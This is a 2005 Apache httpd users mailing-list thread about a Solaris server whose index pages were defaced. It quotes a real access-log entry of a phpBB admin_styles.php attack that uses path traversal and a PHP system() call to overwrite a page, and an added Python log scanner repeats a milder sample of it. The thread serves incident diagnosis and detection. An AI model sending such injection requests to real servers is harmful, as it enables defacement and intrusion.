Re: [users@httpd] Hacked the website replace the index.hm page

Hi Tim,

The intruder replaced only two index.htm files. There is no evidence that the server has been hacked other than that two index.htm files have been replaced.

The phpBB website is owned by a different user and group than the site which has been hacked.

The following is from the access.log. (The hacker replaced the index.htm with one line of text.)

201.128.21.202 - - [08/May/2005:08:05:43 +1000] "GET /virtualforum//admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&nigga=system(\"cd%20/web/departments/student;echo%20XTech%20Inc%20ownz%20-%20students%20-%20y0u%20suck%20>index.shtml\");&sid=655f5166e6110dc5959fe46a96192331 HTTP/1.1" 200 7976


Thanks
Mathew
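
Added example, not part of the original thread: a small Python scan of an Apache access log for the two signs visible in the entry quoted above, a run of "../" in a query parameter and a PHP command-execution call in a parameter value. The sample lines, the 192.0.2.x addresses and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Common Log Format: host ident user [time] "METHOD target PROTO" status bytes
CLF = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                 r'"[A-Z]+ (?P<target>.*) HTTP/[\d.]+" (?P<status>\d{3}) \S+$')
TRAVERSAL = re.compile(r'(?:\.\./){2,}')  # two or more "../" in a row
PHP_CALL = re.compile(r'\b(?:system|exec|passthru|shell_exec|popen|eval)\s*\(', re.I)

def decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded values are inspected too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(lines):
    """Return one finding per log line whose query parameters look hostile."""
    findings = []
    for line in lines:
        m = CLF.match(line.strip())
        if not m:
            continue  # not a parsable access-log entry
        path, _, query = m["target"].partition("?")
        reasons = set()
        for pair in query.split("&"):  # split on "&" only; ";" may be payload
            name, _, raw = pair.partition("=")
            value = decode(raw)
            if TRAVERSAL.search(value):
                reasons.add(f"traversal in '{name}'")
            if PHP_CALL.search(value):
                reasons.add(f"command call in '{name}'")
        if reasons:
            status = int(m["status"])
            findings.append({"host": m["host"], "time": m["time"], "path": path,
                             "status": status, "served": 200 <= status < 300,
                             "reasons": sorted(reasons)})
    return findings

# Constructed sample lines modelled on the entry in the post (not real traffic).
SAMPLE_LOG = [
    r'192.0.2.10 - - [08/May/2005:08:01:12 +1000] "GET /index.htm HTTP/1.1" 200 5120',
    r'192.0.2.44 - - [08/May/2005:08:05:43 +1000] "GET /virtualforum//admin/admin_styles.php?mode=addnew&install_to=../../../../tmp&x=system(\"echo%20test%20>index.shtml\");&sid=0 HTTP/1.1" 200 7976',
    r'192.0.2.44 - - [08/May/2005:08:06:02 +1000] "GET /virtualforum/viewtopic.php?t=12 HTTP/1.1" 200 9100',
    r'192.0.2.77 - - [08/May/2005:08:07:30 +1000] "GET /forum/admin/admin_styles.php?install_to=%252e%252e%252f%252e%252e%252ftmp HTTP/1.1" 404 310',
]

if __name__ == "__main__":
    for f in suspicious_requests(SAMPLE_LOG):
        print(f["time"], f["host"], f["status"], f["path"], "; ".join(f["reasons"]))
```

A flagged line with "served" set to True, like the status 200 in the quoted entry, means the server answered the request rather than rejecting it, so those lines are the ones to review first.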


>>> tim@xxxxxxxxx 9/05/05 9:24:23 >>>
Ok. What evidence do you have that it was a hack? (as opposed to, say, FTP
passwords getting out somehow).

And, by any chance, do the sites that were hacked share any passwords with
accounts on any of the phpBB installations? And, with what were the index
files replaced?

----- Original Message ----- 
From: "Mathew Thomas" <mathew.thomas@xxxxxxxxxxx>
To: <users@xxxxxxxxxxxxxxxx>
Sent: Sunday, May 08, 2005 7:15 PM
Subject: Re: [users@httpd] Hacked the website replace the index.hm page


Hi Tim,

Thanks for the reply. Yes, a couple of virtual hosts are running phpBB. The
websites which have been hacked are not using PHP, mysql or ssl.

Thanks
Mathew


>>> tim@xxxxxxxxx 9/05/05 8:56:04 >>>
We'll probably need more details. You running phpBB anywhere?

----- Original Message ----- 
From: "Mathew Thomas" <mathew.thomas@xxxxxxxxxxx>
To: <users@xxxxxxxxxxxxxxxx>
Sent: Sunday, May 08, 2005 6:49 PM
Subject: [users@httpd] Hacked the website replace the index.hm page


Hi All,

We are running apache_1.3.32 with mod_ssl, mySQL and PHP. OS is Solaris 9.
Apache is running with

User httpd
Group http

Most of the Documentroot is owned by httpd. (There are several virtual hosts
running on this server.)

its-wu-web:departments#  ps -ef | grep http
   httpd 18168 24970  0 00:00:02 ?        0:04 /usr/local/apache/bin/httpd -DSSL
   httpd 16498 24970  0 08:39:24 ?        0:00 /usr/local/apache/bin/httpd -DSSL
   httpd 16492 24970  0 08:39:24 ?        0:00 /usr/local/apache/bin/httpd -DSSL
   httpd 15664 24970  0 08:28:56 ?        0:00 /usr/local/apache/bin/httpd -DSSL
   httpd 16488 24970  0 08:39:23 ?        0:00 /usr/local/apache/bin/httpd -DSSL
   httpd 18182 24970  0 00:00:07 ?        0:04 /usr/local/apache/bin/httpd -DSSL

Somehow a couple of the websites were hacked and the index.htm pages replaced.
How can I prevent it from happening again?

Thanks
Mathew




---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx 
   "   from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx 
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx 

